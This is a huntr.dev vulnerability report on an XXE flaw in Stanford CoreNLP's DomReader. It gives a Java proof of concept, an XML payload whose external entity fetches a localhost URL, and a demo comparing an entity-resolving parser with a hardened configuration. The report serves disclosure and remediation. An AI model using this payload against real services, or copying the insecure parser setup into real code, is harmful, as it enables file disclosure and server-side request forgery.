huntr report A11C889B-CCFF-4FEA-9E29-963A23A63DD2
Reported by srikanthprathi on www.huntr.dev
Published Oct 11, 2021 - 22:54
Repository: stanfordnlp/corenlp
Tags: stanford, corenlp, java, xxe, domreader, xml, vulnerable, security

EPSS

0.004

Percentile

72.7%

Description

Stanford CoreNLP, a set of natural language analysis tools written in Java, parses untrusted XML with a parser that resolves external entities, which makes it vulnerable to XML External Entity (XXE) injection. An attacker who can supply a crafted XML file as input to the readDocument() function in DomReader.java can have the parser resolve attacker-defined external entities. Depending on the entity's SYSTEM identifier this can expose the contents of local files to a remote server or, as in the proof of concept below, make the application issue HTTP requests to a host of the attacker's choosing (server-side request forgery).

Proof of Concept

import java.io.File;

import edu.stanford.nlp.ie.machinereading.common.DomReader;

public class Poc {
    public static void main(String[] args) {
        try {
            // Attacker-controlled XML file; the bracketed user name is a placeholder in the original report.
            File file = new File("C:\\Users\\[user]\\eclipse-workspace\\xxe_poc\\src\\main\\resources\\sample_ssrf.xml");
            // readDocument() parses the file without disabling external entities, so the
            // SYSTEM entity declared in sample_ssrf.xml is fetched while the document is read.
            DomReader obj = new DomReader();
            obj.readDocument(file);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

sample_ssrf.xml

<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://127.0.0.1:8800/test.txt">]>
<foo>&xxe;</foo>
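As an added example (not code from the huntr report or from CoreNLP), the following Java program places the unsafe parser pattern next to a hardened DocumentBuilderFactory configuration. It writes a temporary file, references it through a SYSTEM entity exactly as sample_ssrf.xml does with an HTTP URL, and shows that the JDK's default parser returns the file's contents while the hardened parser rejects the DOCTYPE before any entity can be resolved. The class and method names (XxeDemo, parseInsecure, parseHardened) are the example's own, and the hardening flags are the standard JAXP settings, not the settings used in CoreNLP's fix.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;

import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;

import org.w3c.dom.Document;
import org.xml.sax.SAXException;

public class XxeDemo {

    // Same pattern as the vulnerable reader: a factory with default settings, which on the
    // JDK's built-in parser resolves external general entities declared in the DOCTYPE.
    static Document parseInsecure(String xml) throws Exception {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        DocumentBuilder builder = factory.newDocumentBuilder();
        return builder.parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
    }

    // Hardened factory (example configuration, not CoreNLP's): refuse any DOCTYPE outright,
    // and additionally disable external entities and DTD loading in case a parser ignores
    // the first feature.
    static Document parseHardened(String xml) throws Exception {
        DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
        factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        factory.setXIncludeAware(false);
        factory.setExpandEntityReferences(false);
        DocumentBuilder builder = factory.newDocumentBuilder();
        return builder.parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
    }

    public static void main(String[] args) throws Exception {
        // Constructed "sensitive" file standing in for /etc/passwd or a config file.
        Path secret = Files.createTempFile("xxe-demo", ".txt");
        Files.write(secret, "top-secret".getBytes(StandardCharsets.UTF_8));

        // Same shape as sample_ssrf.xml, but with a file: URI so the demo runs offline.
        String xml = "<?xml version=\"1.0\"?>\n"
                + "<!DOCTYPE foo [<!ENTITY xxe SYSTEM \"" + secret.toUri() + "\">]>\n"
                + "<foo>&xxe;</foo>";

        try {
            Document doc = parseInsecure(xml);
            // The entity is expanded, so the element text is the file's contents.
            System.out.println("insecure parser resolved &xxe; to: "
                    + doc.getDocumentElement().getTextContent());

            try {
                parseHardened(xml);
                System.out.println("hardened parser accepted the document (unexpected)");
            } catch (SAXException e) {
                // disallow-doctype-decl makes the parser fail on the DOCTYPE itself.
                System.out.println("hardened parser rejected the document: " + e.getMessage());
            }
        } finally {
            Files.deleteIfExists(secret);
        }
    }
}
```

Compile and run with javac XxeDemo.java && java XxeDemo; it needs no dependencies beyond the JDK. Rejecting the DOCTYPE is the simplest fix because it blocks external entities, parameter entities and entity-expansion attacks at once; the remaining features only matter for code that must accept a DTD.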
